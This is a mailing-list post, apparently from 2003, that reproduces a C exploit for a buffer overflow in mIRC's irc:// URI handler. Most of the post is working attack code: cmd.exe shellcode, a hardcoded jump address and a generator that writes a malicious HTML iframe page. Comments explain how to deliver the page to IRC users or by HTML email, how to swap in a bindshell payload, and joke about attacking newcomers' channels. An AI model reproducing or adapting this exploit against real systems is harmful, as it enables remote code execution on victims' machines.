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From: daigoku2003 at yahoo.com (test test2)
Subject: remote mirc < 6.11 exploit


Posted on security corporation : http://www.security-corporation.com/exploits-20031021-001.html

/** gEEk-fuck-khaled.c -- remote mirc < 6.11 exploit by blasty
**
** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
**
** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
** nobody had written an exploit yet. So I decided to start writing one.
** Since this was my first time coding a exploit for windows, it took some
** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw :P)
**
** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-
** overflow, and when more then 998 bytes are given EIP will be overwritten.
** 
** At first I was thinking of a simple solution to get this exploitable. Since
** giving an URI with > 998 chars to someone on IRC is simply NOT done :)
** Then I remember the iframe-irc:// flaw found by uuuppzz [2]
**
** This exploit will write an malicious HTML file containing an iframe executing the
** irc:// address. So you can give this to anyone on IRC for example ;)
** The shellcode included does only execute cmd.exe, because I don't want to be this
** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require
** some tweaking.
** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez :)
**
** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
** mIRC will start automatically when an irc:// is executed, so you can also send somebody
** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)
**
** Anyway, have fun with it, and dont own complete newb #chans :P
**
** Greetz to:
** inz, demz, gEEkz team
**
** [1] http://www.packetstormsecurity.nl/0310-advisories/mirc61.txt
** [2] http://www.uuuppz.com/research/adv-001-mirc.htm
**
** -- blasty (blasty@...kz.nl / www.geekz.nl)
**/

#include <stdio.h>


/* Stupid cmd.exe exec shellcode. hey! I r !evil ;) */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()


char jmpback[] =
"\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode :)

char buffer[1100], fstring[1300]; // heh, need to clean this up

int main(int argc, char *argv[]) {
FILE *evil;

fprintf(stdout, "---------------------------------------------\n"
"mIRC < 6.11 remote exploit by blasty@...kz.nl\n"
"---------------------------------------------\n\n");

// NOPslides are cool
memset(buffer, 0x90, sizeof(buffer) - 1);

// place shellcode in buffer
memcpy(buffer + 20, shellcode, strlen(shellcode));

// took this one from ntdll.dll (jmp esp)
*(long *)&buffer[994] = 0x77F4801C;

// place jmpback shellcode in buffer
memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));

printf("[+] Evil buffer constructed\n");


// open HTML file for writing
if((evil = fopen("index.html", "a+")) != NULL) {

// construct evil string :)
sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);

// write string to file
fputs(fstring, evil);

// close file
fclose(evil);

printf("[+] Evil HTML file written!\n");
return(0);
} else {
// uh oh.. :/
fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
exit(1);
}


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